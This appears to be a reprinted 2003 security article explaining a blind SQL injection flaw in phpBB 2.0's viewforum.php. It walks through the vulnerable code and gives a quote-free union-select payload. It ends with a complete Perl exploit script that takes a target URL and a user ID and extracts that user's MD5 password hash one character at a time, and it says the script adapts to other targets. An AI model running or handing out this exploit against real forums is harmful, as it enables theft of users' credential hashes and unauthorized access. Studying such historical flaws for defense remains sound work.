PHP injection instance


Creation time: 2003-12-08

Article properties: reprint

Submitted by: 19821119 (19821119_at_vip.sina.com)

Author: PinKeyes

It is hard to find a complete article on PHP injection that comes with working code, so I spent a few weeks going over MySQL and PHP again. Here is what I found; I hope it can serve as a starting point for others (throwing out a brick to attract jade).

I believe everyone is already very familiar with ASP injection. PHP injection is harder than ASP injection, because PHP's magic_quotes_gpc option is a real headache: you cannot use quotation marks in the injected string. PHP is also usually paired with MySQL, and the limitations of MySQL's functions, seen from the other side, prevent SQL injection attacks to a certain extent. I will give an example here, taking phpBB 2.0 as the case:

There is a variable in viewforum.php that is not filtered:

```php
// viewforum.php (phpBB 2.0): POST_FORUM_URL is phpBB's constant for the "f" parameter
if ( isset($HTTP_GET_VARS[POST_FORUM_URL]) || isset($HTTP_POST_VARS[POST_FORUM_URL]) )
{
    $forum_id = ( isset($HTTP_GET_VARS[POST_FORUM_URL]) ) ? $HTTP_GET_VARS[POST_FORUM_URL] : $HTTP_POST_VARS[POST_FORUM_URL];
}
else if ( isset($HTTP_GET_VARS['forum']) )
{
    // taken straight from the query string, with no integer cast or check
    $forum_id = $HTTP_GET_VARS['forum'];
}
else
{
    $forum_id = '';
}
```

That variable is forum, and it is put directly into the query:

```php
if ( !empty($forum_id) )
{
    // $forum_id is interpolated unquoted into a numeric comparison
    $sql = "SELECT *
        FROM " . FORUMS_TABLE . "
        WHERE forum_id = $forum_id";
    if ( !($result = $db->sql_query($sql)) )
    {
        message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
    }
}
else
{
    message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}
```

If this were ASP, I believe many people would already know how to inject here. If the forum specified by forum_id does not exist, $result will be empty, "Could not obtain forums information" is returned, and the code below is never reached.

```php
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
    message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id);   /********** the key line **********/
```

The key is the line marked with stars: session_pagestart($user_ip, $thispage_id) is a function defined in session.php. The code is too long to post in full; interested readers can look at it themselves. The important point is that this function in turn calls session_begin(), as session_begin($user_id, $user_ip, $thispage_id, true), which is defined in the same file and contains the following code:

```php
// session_begin() in session.php: $page_id is the caller's $forum_id, interpolated unquoted
$sql = "UPDATE " . SESSIONS_TABLE . "
    SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page = $page_id, session_logged_in = $login
    WHERE session_id = '" . $session_id . "'
        AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) || !$db->sql_affectedrows() )
{
    $session_id = md5(uniqid($user_ip));

    $sql = "INSERT INTO " . SESSIONS_TABLE . "
        (session_id, session_user_id, session_start, session_time, session_ip, session_page, session_logged_in)
        VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
    if ( !($result = $db->sql_query($sql)) )
    {
        // this message, shown to the user, is what gives the guess away
        message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__, $sql);
    }
}
```

Here session_page is a column defined in MySQL, and its value $page_id is $forum_id. If the value inserted is not an integer, the query fails and the prompt "Error creating new session : session_begin" appears. So the value passed as $forum_id matters, and I set it to: -1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57 Note that there are no quotation marks! Although the forum_id specified does not exist, the query result is not empty when the ASCII code of the first character of user_id 2's password is 57. Because the first check in the code above then sees a non-empty result, execution reaches session_pagestart, where inserting a non-integer value fails, and "Error creating new session : session_begin" is displayed. That indicates the first character was guessed correctly; the other positions work the same way.

Without this error message, I think it would be hard to tell whether the injection succeeded even when it did; the error message turns out to be very helpful. That ends the analysis. Attached below is a test script; with slight modifications it can be applied to other similar cases of guessing MD5 passwords. I use the return condition of the English version here; for Chinese and other language versions only the return condition needs to change.

```perl
use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;

$ua = new LWP::UserAgent;

print "*********************\n";
print "phpBB viewforum.php exp\n";
print "code by pinkeyes\n";
print "www.icehack.com\n";
print "*********************\n";
print "Please enter the weak file's url:\n";
print "e.g. http://192.168.1.4/phpbb2/viewforum.php\n";
$adr = <STDIN>;
chomp($adr);
print "Please enter the user_id that you want to crack\n";
$u = <STDIN>;
chomp($u);
print "Work starting, please wait!\n";
$pwd = "";

# candidate characters of an MD5 hex digest: '0'..'9' and 'a'..'f'
@pink = (48..57);
@pink = (@pink, 97..102);

# 32 hex characters, each tried against every candidate
for ($j = 1; $j <= 32; $j++) {
    for ($i = 0; $i < @pink; $i++) {
        $url = $adr . "?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
        $request = HTTP::Request->new('GET', "$url");
        $response = $ua->request($request);
        if ($response->is_success) {
            # the return condition: the session error means the guess was right
            if ($response->content =~ /Error creating new session/) {
                $pwd .= chr($pink[$i]);
                print "$pwd\n";
            }
        }
    }
}

if ($pwd ne "") {
    print "Successfully, the password is $pwd, good luck\n";
}
else {
    print "Bad luck, work failed!\n";
}
```

As for the recent phpBB 2.0.6 search.php problem, it can be exploited with only slight modifications to the code above. If there are errors, please point them out at www.icehack.com.

Copyright (c) 2001-2003 SafeChina.Net All Rights Reserved

Please cite the original URL when reprinting: https://www.9cbs.com/read-57487.html
